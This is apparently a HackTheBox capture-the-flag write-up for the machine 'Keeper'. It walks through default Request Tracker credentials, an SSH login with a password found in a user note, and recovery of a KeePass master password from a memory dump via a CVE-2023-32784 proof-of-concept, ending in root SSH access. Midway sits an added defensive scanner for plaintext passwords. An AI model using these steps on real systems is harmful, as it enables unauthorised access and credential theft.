
Keeper

os: Linux
difficulty: Easy
date: 2026-03-15
platform: HackTheBox
request-tracker default-creds keepass CVE-2023-32784

// reconnaissance

Starting with a standard nmap scan to identify open ports and running services on the target.

$ nmap -sC -sV -oN nmap/initial 10.10.11.227
Starting Nmap 7.94 ( https://nmap.org )
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Login

Only two ports open. Port 80 redirects to tickets.keeper.htb. Adding the hostname to /etc/hosts and navigating to the site reveals a Request Tracker (RT) login page.

// enumeration

Request Tracker is a well-known ticketing system. Checking for default credentials before going deeper.

# Default RT credentials
Username: root
Password: password
[+] Login successful — full admin access to RT instance

Default credentials work. Inside the admin panel, we find a user account for lnorgaard (Lise Norgaard). Her user profile contains a note with her initial password stored in plaintext — a common lazy admin move.

# From user profile notes
New user. Initial password set to Welcome2023!
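A plaintext password left in a profile note is something an RT administrator can sweep for during an audit. The scanner below is an added example, not part of the original write-up: it flags credential-looking tokens in free-text user fields and masks them in its report. The record layout, the field names and the two extra sample users are assumptions constructed for illustration.

```python
import re

# Credential keyword, then a connector ("set to", "is", "was", ":" or "="), then a token.
CRED_RE = re.compile(
    r"\b(?:password|passwd|pwd|passphrase)\b\s*"
    r"(?:(?:is|was)?\s*(?:re)?set\s+to|is|was|[:=])\s*"
    r"(?P<secret>\S+)",
    re.IGNORECASE,
)

# Free-text user fields to sweep (assumed names for the exported records).
FREE_TEXT_FIELDS = ("Comments", "Signature", "FreeformContactInfo")

# Constructed sample export. Only the first note is quoted from the write-up.
SAMPLE_USERS = [
    {"Name": "lnorgaard", "Comments": "New user. Initial password set to Welcome2023!"},
    {"Name": "jdoe", "Comments": "Asked to reset password via the self-service portal."},
    {"Name": "svc_mail", "Comments": "Password is required to rotate every 90 days."},
]


def looks_like_secret(token, min_len=8):
    """Heuristic: long enough and mixing two or more of letters, digits, symbols."""
    classes = (
        any(c.isalpha() for c in token),
        any(c.isdigit() for c in token),
        any(not c.isalnum() for c in token),
    )
    return len(token) >= min_len and sum(classes) >= 2


def mask(token):
    """Keep the first character only so the report does not re-leak the secret."""
    return token[0] + "*" * (len(token) - 1)


def audit_users(users):
    """Return (user, field, masked_token) for each suspected plaintext credential."""
    findings = []
    for user in users:
        for field in FREE_TEXT_FIELDS:
            for m in CRED_RE.finditer(user.get(field) or ""):
                token = m.group("secret")
                if looks_like_secret(token):
                    findings.append((user["Name"], field, mask(token)))
    return findings


if __name__ == "__main__":
    for name, field, masked in audit_users(SAMPLE_USERS):
        print(f"{name}: possible plaintext password in {field}: {masked}")
```

The character-class heuristic keeps phrases such as "password is required" out of the report; tune `min_len` and the connector list to the wording your helpdesk actually uses.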

// initial foothold

Using the discovered credentials to SSH in as lnorgaard.

$ ssh lnorgaard@10.10.11.227
lnorgaard@10.10.11.227's password: Welcome2023!
lnorgaard@keeper:~$

We're in. The user flag is right in the home directory.

// privilege escalation

In lnorgaard's home directory, there's a zip file containing a KeePass process memory dump (a crash dump file) and a KeePass database.

lnorgaard@keeper:~$ ls -la
-rw-r--r-- 1 root      root      87391651 RT30000.zip
-rw-r----- 1 lnorgaard lnorgaard       33 user.txt
lnorgaard@keeper:~$ unzip RT30000.zip
  inflating: KeePassDumpFull.dmp
  inflating: passcodes.kdbx

KeePass version 2.x is vulnerable to CVE-2023-32784 — a memory dump attack that can recover the master password from a process dump. Using the PoC tool to extract it.

$ python3 keepass-dump-masterkey/poc.py -d KeePassDumpFull.dmp
Possible password: ●ldgr●d med fl●de
# Googling the partial match reveals a Danish recipe: rødgrød med fløde

Opening the KeePass database with the recovered password reveals a PuTTY PPK key stored in the root entry's notes field. Converting it to OpenSSH format and using it to authenticate as root.

$ puttygen key.ppk -O private-openssh -o root_key
$ chmod 600 root_key
$ ssh -i root_key root@10.10.11.227
root@keeper:~#

// flags

user.txt
b09xxxxxxxxxxxxxxxxxxxxxxxx3f91
root.txt
d44xxxxxxxxxxxxx8a10

// lessons learned
